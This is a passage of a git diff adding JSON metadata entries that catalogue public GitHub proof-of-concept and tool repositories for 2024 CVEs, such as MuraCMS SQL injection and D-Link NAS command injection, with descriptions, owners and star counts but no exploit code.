+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-32399.json b/2024/CVE-2024-32399.json
new file mode 100644
index 0000000000..f309c7cf46
--- /dev/null
+++ b/2024/CVE-2024-32399.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 790269006,
+ "name": "CVE-2024-32399",
+ "full_name": "NN0b0dy\/CVE-2024-32399",
+ "owner": {
+ "login": "NN0b0dy",
+ "id": 166635896,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/166635896?v=4",
+ "html_url": "https:\/\/github.com\/NN0b0dy"
+ },
+ "html_url": "https:\/\/github.com\/NN0b0dy\/CVE-2024-32399",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-22T15:15:37Z",
+ "updated_at": "2024-04-22T15:16:26Z",
+ "pushed_at": "2024-04-22T15:16:22Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-32459.json b/2024/CVE-2024-32459.json
new file mode 100644
index 0000000000..3ce505fe34
--- /dev/null
+++ b/2024/CVE-2024-32459.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 804159088,
+ "name": "FreeRDP-Out-of-Bounds-Read-CVE-2024-32459-",
+ "full_name": "absholi7ly\/FreeRDP-Out-of-Bounds-Read-CVE-2024-32459-",
+ "owner": {
+ "login": "absholi7ly",
+ "id": 72062217,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72062217?v=4",
+ "html_url": "https:\/\/github.com\/absholi7ly"
+ },
+ "html_url": "https:\/\/github.com\/absholi7ly\/FreeRDP-Out-of-Bounds-Read-CVE-2024-32459-",
+ "description": "The FreeRDP - Out-of-Bounds Read (CVE-2024-32459) vulnerability concerns FreeRDP, a free implementation of Remote Desktop Protocol. FreeRDP-based clients and servers using a version of FreeRDP prior to version 3.5.0 or 2.11.6 are vulnerable to out-of-bounds reading12. Versions 3.5.0 and 2.11.6 correct the problem",
+ "fork": false,
+ "created_at": "2024-05-22T04:19:27Z",
+ "updated_at": "2024-06-01T00:12:41Z",
+ "pushed_at": "2024-05-22T04:30:21Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-32523.json b/2024/CVE-2024-32523.json
new file mode 100644
index 0000000000..1df7157262
--- /dev/null
+++ b/2024/CVE-2024-32523.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 799304116,
+ "name": "CVE-2024-32523-Poc",
+ "full_name": "truonghuuphuc\/CVE-2024-32523-Poc",
+ "owner": {
+ "login": "truonghuuphuc",
+ "id": 20487674,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4",
+ "html_url": "https:\/\/github.com\/truonghuuphuc"
+ },
+ "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-32523-Poc",
+ "description": "CVE-2024-32523 Mailster <= 4.0.6 - Unauthenticated Local File Inclusion",
+ "fork": false,
+ "created_at": "2024-05-11T18:16:31Z",
+ "updated_at": "2024-05-20T09:24:47Z",
+ "pushed_at": "2024-05-11T18:59:22Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-32640.json b/2024/CVE-2024-32640.json
new file mode 100644
index 0000000000..dcd604f03c
--- /dev/null
+++ b/2024/CVE-2024-32640.json
@@ -0,0 +1,104 @@
+[
+ {
+ "id": 801300321,
+ "name": "CVE-2024-32640-SQLI-MuraCMS",
+ "full_name": "Stuub\/CVE-2024-32640-SQLI-MuraCMS",
+ "owner": {
+ "login": "Stuub",
+ "id": 60468836,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60468836?v=4",
+ "html_url": "https:\/\/github.com\/Stuub"
+ },
+ "html_url": "https:\/\/github.com\/Stuub\/CVE-2024-32640-SQLI-MuraCMS",
+ "description": "CVE-2024-32640 | Automated SQLi Exploitation PoC",
+ "fork": false,
+ "created_at": "2024-05-16T01:02:32Z",
+ "updated_at": "2024-06-26T02:41:15Z",
+ "pushed_at": "2024-05-16T21:07:32Z",
+ "stargazers_count": 51,
+ "watchers_count": 51,
+ "has_discussions": false,
+ "forks_count": 9,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "0day",
+ "cve",
+ "cve-2024",
+ "cve-2024-32640",
+ "cve-2024-32640-poc",
+ "exploit",
+ "masacms",
+ "muracms",
+ "poc",
+ "rce",
+ "sqli"
+ ],
+ "visibility": "public",
+ "forks": 9,
+ "watchers": 51,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 802083233,
+ "name": "CVE-2024-32640-SQLI-MuraCMS",
+ "full_name": "0x3f3c\/CVE-2024-32640-SQLI-MuraCMS",
+ "owner": {
+ "login": "0x3f3c",
+ "id": 154844497,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154844497?v=4",
+ "html_url": "https:\/\/github.com\/0x3f3c"
+ },
+ "html_url": "https:\/\/github.com\/0x3f3c\/CVE-2024-32640-SQLI-MuraCMS",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-17T13:43:59Z",
+ "updated_at": "2024-06-01T18:21:22Z",
+ "pushed_at": "2024-05-17T13:54:29Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 811262145,
+ "name": "CVE-2024-32640",
+ "full_name": "sammings\/CVE-2024-32640",
+ "owner": {
+ "login": "sammings",
+ "id": 149979829,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149979829?v=4",
+ "html_url": "https:\/\/github.com\/sammings"
+ },
+ "html_url": "https:\/\/github.com\/sammings\/CVE-2024-32640",
+ "description": "sql延时注入poc",
+ "fork": false,
+ "created_at": "2024-06-06T08:56:34Z",
+ "updated_at": "2024-06-06T08:58:13Z",
+ "pushed_at": "2024-06-06T08:58:09Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-32651.json b/2024/CVE-2024-32651.json
new file mode 100644
index 0000000000..40f54fc5a5
--- /dev/null
+++ b/2024/CVE-2024-32651.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 806279478,
+ "name": "cve-2024-32651",
+ "full_name": "zcrosman\/cve-2024-32651",
+ "owner": {
+ "login": "zcrosman",
+ "id": 21688962,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21688962?v=4",
+ "html_url": "https:\/\/github.com\/zcrosman"
+ },
+ "html_url": "https:\/\/github.com\/zcrosman\/cve-2024-32651",
+ "description": "changedetection rce though ssti",
+ "fork": false,
+ "created_at": "2024-05-26T21:24:14Z",
+ "updated_at": "2024-05-26T21:42:11Z",
+ "pushed_at": "2024-05-26T21:42:08Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-32709.json b/2024/CVE-2024-32709.json
new file mode 100644
index 0000000000..1db437f2a2
--- /dev/null
+++ b/2024/CVE-2024-32709.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 796349926,
+ "name": "CVE-2024-32709-Poc",
+ "full_name": "truonghuuphuc\/CVE-2024-32709-Poc",
+ "owner": {
+ "login": "truonghuuphuc",
+ "id": 20487674,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4",
+ "html_url": "https:\/\/github.com\/truonghuuphuc"
+ },
+ "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-32709-Poc",
+ "description": "CVE-2024-32709 WP-Recall – Registration, Profile, Commerce & More <= 16.26.5 - Unauthenticated SQL Injection",
+ "fork": false,
+ "created_at": "2024-05-05T17:21:55Z",
+ "updated_at": "2024-05-25T14:34:13Z",
+ "pushed_at": "2024-05-06T16:17:51Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-3272.json b/2024/CVE-2024-3272.json
new file mode 100644
index 0000000000..713d42c9f5
--- /dev/null
+++ b/2024/CVE-2024-3272.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 783750436,
+ "name": "D-Link-NAS-Devices-Unauthenticated-RCE",
+ "full_name": "nickswink\/D-Link-NAS-Devices-Unauthenticated-RCE",
+ "owner": {
+ "login": "nickswink",
+ "id": 57839593,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57839593?v=4",
+ "html_url": "https:\/\/github.com\/nickswink"
+ },
+ "html_url": "https:\/\/github.com\/nickswink\/D-Link-NAS-Devices-Unauthenticated-RCE",
+ "description": "UNTESTED exploit script for CVE-2024-3272 + CVE-2024-3273. The script exploits a backdoor authentication bypass + arbitrary command injection vulnerability. ",
+ "fork": false,
+ "created_at": "2024-04-08T13:54:07Z",
+ "updated_at": "2024-05-22T10:40:59Z",
+ "pushed_at": "2024-04-08T13:57:31Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 803710130,
+ "name": "dinkleberry",
+ "full_name": "aliask\/dinkleberry",
+ "owner": {
+ "login": "aliask",
+ "id": 6219869,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6219869?v=4",
+ "html_url": "https:\/\/github.com\/aliask"
+ },
+ "html_url": "https:\/\/github.com\/aliask\/dinkleberry",
+ "description": "Patch your D-Link device affected by CVE-2024-3272 ",
+ "fork": false,
+ "created_at": "2024-05-21T08:40:37Z",
+ "updated_at": "2024-05-25T00:36:53Z",
+ "pushed_at": "2024-05-25T00:36:49Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-3273.json b/2024/CVE-2024-3273.json
new file mode 100644
index 0000000000..6f5716a117
--- /dev/null
+++ b/2024/CVE-2024-3273.json
@@ -0,0 +1,258 @@
+[
+ {
+ "id": 783134888,
+ "name": "CVE-2024-3273",
+ "full_name": "Chocapikk\/CVE-2024-3273",
+ "owner": {
+ "login": "Chocapikk",
+ "id": 88535377,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4",
+ "html_url": "https:\/\/github.com\/Chocapikk"
+ },
+ "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-3273",
+ "description": "D-Link NAS CVE-2024-3273 Exploit Tool",
+ "fork": false,
+ "created_at": "2024-04-07T03:09:13Z",
+ "updated_at": "2024-05-28T18:16:36Z",
+ "pushed_at": "2024-04-07T04:41:26Z",
+ "stargazers_count": 73,
+ "watchers_count": 73,
+ "has_discussions": false,
+ "forks_count": 17,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 17,
+ "watchers": 73,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 783329699,
+ "name": "CVE-2024-3273",
+ "full_name": "adhikara13\/CVE-2024-3273",
+ "owner": {
+ "login": "adhikara13",
+ "id": 44716348,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44716348?v=4",
+ "html_url": "https:\/\/github.com\/adhikara13"
+ },
+ "html_url": "https:\/\/github.com\/adhikara13\/CVE-2024-3273",
+ "description": "Exploit for CVE-2024-3273, supports single and multiple hosts",
+ "fork": false,
+ "created_at": "2024-04-07T15:36:18Z",
+ "updated_at": "2024-04-21T10:35:47Z",
+ "pushed_at": "2024-04-07T15:41:42Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 783429302,
+ "name": "honeypot-dlink-CVE-2024-3273",
+ "full_name": "yarienkiva\/honeypot-dlink-CVE-2024-3273",
+ "owner": {
+ "login": "yarienkiva",
+ "id": 42248482,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42248482?v=4",
+ "html_url": "https:\/\/github.com\/yarienkiva"
+ },
+ "html_url": "https:\/\/github.com\/yarienkiva\/honeypot-dlink-CVE-2024-3273",
+ "description": "Quick and dirty honeypot for CVE-2024-3273",
+ "fork": false,
+ "created_at": "2024-04-07T21:15:33Z",
+ "updated_at": "2024-04-07T21:40:55Z",
+ "pushed_at": "2024-04-16T00:00:15Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 784219188,
+ "name": "CVE-2024-3273-EXPLOIT",
+ "full_name": "K3ysTr0K3R\/CVE-2024-3273-EXPLOIT",
+ "owner": {
+ "login": "K3ysTr0K3R",
+ "id": 70909693,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4",
+ "html_url": "https:\/\/github.com\/K3ysTr0K3R"
+ },
+ "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2024-3273-EXPLOIT",
+ "description": "A PoC exploit for CVE-2024-3273 - D-Link Remote Code Execution RCE",
+ "fork": false,
+ "created_at": "2024-04-09T12:26:37Z",
+ "updated_at": "2024-04-13T13:27:51Z",
+ "pushed_at": "2024-04-09T12:51:41Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "command-injection",
+ "command-injections",
+ "cve-2024-3273",
+ "d-link",
+ "devices",
+ "exploit",
+ "exploitation",
+ "exploits",
+ "hacking",
+ "poc",
+ "proof-of-concept",
+ "rce-exploit",
+ "remote-code-execution",
+ "scanner",
+ "systems"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 784490856,
+ "name": "CVE-2024-3273",
+ "full_name": "ThatNotEasy\/CVE-2024-3273",
+ "owner": {
+ "login": "ThatNotEasy",
+ "id": 25004320,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25004320?v=4",
+ "html_url": "https:\/\/github.com\/ThatNotEasy"
+ },
+ "html_url": "https:\/\/github.com\/ThatNotEasy\/CVE-2024-3273",
+ "description": "D-Link NAS Command Execution Exploit",
+ "fork": false,
+ "created_at": "2024-04-10T00:27:02Z",
+ "updated_at": "2024-04-11T23:05:26Z",
+ "pushed_at": "2024-04-10T00:36:05Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 787302962,
+ "name": "CVE-2024-3273",
+ "full_name": "LeopoldSkell\/CVE-2024-3273",
+ "owner": {
+ "login": "LeopoldSkell",
+ "id": 96363396,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96363396?v=4",
+ "html_url": "https:\/\/github.com\/LeopoldSkell"
+ },
+ "html_url": "https:\/\/github.com\/LeopoldSkell\/CVE-2024-3273",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-16T09:12:58Z",
+ "updated_at": "2024-04-16T09:12:58Z",
+ "pushed_at": "2024-04-16T09:12:58Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 790582261,
+ "name": "CVE-2024-3273-",
+ "full_name": "mrrobot0o\/CVE-2024-3273-",
+ "owner": {
+ "login": "mrrobot0o",
+ "id": 88867340,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88867340?v=4",
+ "html_url": "https:\/\/github.com\/mrrobot0o"
+ },
+ "html_url": "https:\/\/github.com\/mrrobot0o\/CVE-2024-3273-",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-23T06:31:19Z",
+ "updated_at": "2024-04-23T06:32:42Z",
+ "pushed_at": "2024-04-23T06:32:39Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 796423211,
+ "name": "Turvan6rkus-CVE-2024-3273",
+ "full_name": "OIivr\/Turvan6rkus-CVE-2024-3273",
+ "owner": {
+ "login": "OIivr",
+ "id": 114483187,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114483187?v=4",
+ "html_url": "https:\/\/github.com\/OIivr"
+ },
+ "html_url": "https:\/\/github.com\/OIivr\/Turvan6rkus-CVE-2024-3273",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-05T22:07:02Z",
+ "updated_at": "2024-05-25T17:29:10Z",
+ "pushed_at": "2024-05-25T17:27:56Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-32766.json b/2024/CVE-2024-32766.json
new file mode 100644
index 0000000000..bf276c41d5
--- /dev/null
+++ b/2024/CVE-2024-32766.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 795272972,
+ "name": "CVE-2024-32766-RCE",
+ "full_name": "3W1nd4r\/CVE-2024-32766-RCE",
+ "owner": {
+ "login": "3W1nd4r",
+ "id": 168788117,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/168788117?v=4",
+ "html_url": "https:\/\/github.com\/3W1nd4r"
+ },
+ "html_url": "https:\/\/github.com\/3W1nd4r\/CVE-2024-32766-RCE",
+ "description": "writeup and PoC for CVE-2024-32766 (QNAP) OS command injection and auth bypass",
+ "fork": false,
+ "created_at": "2024-05-02T23:39:18Z",
+ "updated_at": "2024-05-02T23:39:41Z",
+ "pushed_at": "2024-05-02T23:39:38Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-3293.json b/2024/CVE-2024-3293.json
new file mode 100644
index 0000000000..c230f21190
--- /dev/null
+++ b/2024/CVE-2024-3293.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 807945955,
+ "name": "CVE-2024-3293-Poc",
+ "full_name": "truonghuuphuc\/CVE-2024-3293-Poc",
+ "owner": {
+ "login": "truonghuuphuc",
+ "id": 20487674,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4",
+ "html_url": "https:\/\/github.com\/truonghuuphuc"
+ },
+ "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-3293-Poc",
+ "description": "CVE-2024-3293 rtMedia for WordPress, BuddyPress and bbPress <= 4.6.18 - Authenticated (Contributor+) SQL Injection via rtmedia_gallery Shortcode",
+ "fork": false,
+ "created_at": "2024-05-30T04:51:32Z",
+ "updated_at": "2024-05-30T05:01:02Z",
+ "pushed_at": "2024-05-30T05:00:37Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-33078.json b/2024/CVE-2024-33078.json
new file mode 100644
index 0000000000..605ea9dd84
--- /dev/null
+++ b/2024/CVE-2024-33078.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 794619298,
+ "name": "CVE-2024-33078",
+ "full_name": "HBLocker\/CVE-2024-33078",
+ "owner": {
+ "login": "HBLocker",
+ "id": 48737752,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48737752?v=4",
+ "html_url": "https:\/\/github.com\/HBLocker"
+ },
+ "html_url": "https:\/\/github.com\/HBLocker\/CVE-2024-33078",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-01T15:45:45Z",
+ "updated_at": "2024-05-01T15:47:51Z",
+ "pushed_at": "2024-05-01T15:47:48Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-33111.json b/2024/CVE-2024-33111.json
new file mode 100644
index 0000000000..f3c1c73140
--- /dev/null
+++ b/2024/CVE-2024-33111.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 819977597,
+ "name": "CVE-2024-33111",
+ "full_name": "FaLLenSKiLL1\/CVE-2024-33111",
+ "owner": {
+ "login": "FaLLenSKiLL1",
+ "id": 43922662,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43922662?v=4",
+ "html_url": "https:\/\/github.com\/FaLLenSKiLL1"
+ },
+ "html_url": "https:\/\/github.com\/FaLLenSKiLL1\/CVE-2024-33111",
+ "description": "D-Link DIR-845L router is vulnerable to Cross Site Scripting (XSS) via \/htdocs\/webinc\/js\/bsc_sms_inbox.php.",
+ "fork": false,
+ "created_at": "2024-06-25T14:54:01Z",
+ "updated_at": "2024-06-25T14:58:30Z",
+ "pushed_at": "2024-06-25T14:58:26Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-33113.json b/2024/CVE-2024-33113.json
new file mode 100644
index 0000000000..dc409fc233
--- /dev/null
+++ b/2024/CVE-2024-33113.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 819580514,
+ "name": "CVE-2024-33113",
+ "full_name": "FaLLenSKiLL1\/CVE-2024-33113",
+ "owner": {
+ "login": "FaLLenSKiLL1",
+ "id": 43922662,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43922662?v=4",
+ "html_url": "https:\/\/github.com\/FaLLenSKiLL1"
+ },
+ "html_url": "https:\/\/github.com\/FaLLenSKiLL1\/CVE-2024-33113",
+ "description": "D-LINK DIR-845L is vulnerable to information disclosure via the bsc_sms_inbox.php file.",
+ "fork": false,
+ "created_at": "2024-06-24T19:50:13Z",
+ "updated_at": "2024-06-25T10:18:37Z",
+ "pushed_at": "2024-06-24T21:27:10Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 819959946,
+ "name": "CVE-2024-33113",
+ "full_name": "tekua\/CVE-2024-33113",
+ "owner": {
+ "login": "tekua",
+ "id": 38267231,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38267231?v=4",
+ "html_url": "https:\/\/github.com\/tekua"
+ },
+ "html_url": "https:\/\/github.com\/tekua\/CVE-2024-33113",
+ "description": "Le routeur D-LINK DIR-845L est vulnérable à un problème de divulgation d'informations. Plus précisément, le fichier bsc_sms_inbox.php sur l'appareil peut être exploité pour divulguer des informations sensibles.",
+ "fork": false,
+ "created_at": "2024-06-25T14:16:03Z",
+ "updated_at": "2024-06-25T14:44:24Z",
+ "pushed_at": "2024-06-25T14:42:30Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-33438.json b/2024/CVE-2024-33438.json
new file mode 100644
index 0000000000..6edf64d091
--- /dev/null
+++ b/2024/CVE-2024-33438.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 791393298,
+ "name": "CVE-2024-33438",
+ "full_name": "julio-cfa\/CVE-2024-33438",
+ "owner": {
+ "login": "julio-cfa",
+ "id": 52619625,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52619625?v=4",
+ "html_url": "https:\/\/github.com\/julio-cfa"
+ },
+ "html_url": "https:\/\/github.com\/julio-cfa\/CVE-2024-33438",
+ "description": "CubeCart <= 6.5.4 is vulnerable to an arbitrary file upload that leads to remote code execution (RCE).",
+ "fork": false,
+ "created_at": "2024-04-24T16:31:17Z",
+ "updated_at": "2024-05-25T15:56:17Z",
+ "pushed_at": "2024-05-02T16:06:40Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-33559.json b/2024/CVE-2024-33559.json
new file mode 100644
index 0000000000..68f7fe29da
--- /dev/null
+++ b/2024/CVE-2024-33559.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 801864496,
+ "name": "WordPress-XStore-theme-SQL-Injection",
+ "full_name": "absholi7ly\/WordPress-XStore-theme-SQL-Injection",
+ "owner": {
+ "login": "absholi7ly",
+ "id": 72062217,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72062217?v=4",
+ "html_url": "https:\/\/github.com\/absholi7ly"
+ },
+ "html_url": "https:\/\/github.com\/absholi7ly\/WordPress-XStore-theme-SQL-Injection",
+ "description": "(CVE-2024-33559) The XStore theme for WordPress is vulnerable to SQL Injection due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query",
+ "fork": false,
+ "created_at": "2024-05-17T04:15:34Z",
+ "updated_at": "2024-06-21T12:57:03Z",
+ "pushed_at": "2024-05-17T04:20:29Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
